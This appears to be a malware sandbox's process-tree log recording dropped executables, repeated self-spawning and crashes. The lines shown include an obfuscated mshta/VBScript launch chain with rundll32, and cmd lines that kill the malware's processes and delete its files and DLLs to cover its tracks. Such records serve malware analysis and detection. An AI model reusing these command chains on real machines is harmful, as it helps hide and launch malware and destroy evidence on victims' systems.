C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exeC:\Users\Admin\Documents\Z93VzqaNWtjd5VRixOVgMODo.exe3⤵
-
C:\Users\Admin\Documents\iZXDunGUmJUrMAjkcm1HiYnD.exe"C:\Users\Admin\Documents\iZXDunGUmJUrMAjkcm1HiYnD.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Bf4YOJOO.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Bf4YOJOO.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3512 -s 2484⤵
- Program crash
-
C:\Users\Admin\Documents\pn1CRHJihlF7AUiO8r9WkjsW.exe"C:\Users\Admin\Documents\pn1CRHJihlF7AUiO8r9WkjsW.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im pn1CRHJihlF7AUiO8r9WkjsW.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\pn1CRHJihlF7AUiO8r9WkjsW.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im pn1CRHJihlF7AUiO8r9WkjsW.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe"C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5652 -s 244⤵
- Program crash
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 244⤵
- Program crash
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 244⤵
- Program crash
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exeC:\Users\Admin\Documents\mhWe_FDhSpNOUE8tGRp7tzbG.exe3⤵
-
C:\Users\Admin\Documents\eVtDy2kmSwURtva2vBMA9qU6.exe"C:\Users\Admin\Documents\eVtDy2kmSwURtva2vBMA9qU6.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0356011180.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\0356011180.exe"C:\Users\Admin\AppData\Local\Temp\0356011180.exe"4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "eVtDy2kmSwURtva2vBMA9qU6.exe" /f & erase "C:\Users\Admin\Documents\eVtDy2kmSwURtva2vBMA9qU6.exe" & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "eVtDy2kmSwURtva2vBMA9qU6.exe" /f4⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\zsI5t_eJTJVnSpRUvfyY0ZV0.exe"C:\Users\Admin\Documents\zsI5t_eJTJVnSpRUvfyY0ZV0.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRipT: CLOSe ( CreATEoBjECT ("wscrIpt.SheLL" ). RUn ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\Documents\zsI5t_eJTJVnSpRUvfyY0ZV0.exe"" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF """" == """" for %N In ( ""C:\Users\Admin\Documents\zsI5t_eJTJVnSpRUvfyY0ZV0.exe"" ) do taskkill -F /Im ""%~nXN"" " , 0, True ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\Documents\zsI5t_eJTJVnSpRUvfyY0ZV0.exe" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF "" == "" for %N In ("C:\Users\Admin\Documents\zsI5t_eJTJVnSpRUvfyY0ZV0.exe" ) do taskkill -F /Im "%~nXN"4⤵
-
C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exEKRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRipT: CLOSe ( CreATEoBjECT ("wscrIpt.SheLL" ). RUn ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE"" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF ""-pA1IQsAATOS0kxrmeOcrgfdjncUG "" == """" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE"" ) do taskkill -F /Im ""%~nXN"" " , 0, True ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF "-pA1IQsAATOS0kxrmeOcrgfdjncUG " == "" for %N In ("C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE" ) do taskkill -F /Im "%~nXN"7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\p_ZPP.J p6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F /Im "zsI5t_eJTJVnSpRUvfyY0ZV0.exe"5⤵
- Kills process with taskkill
-
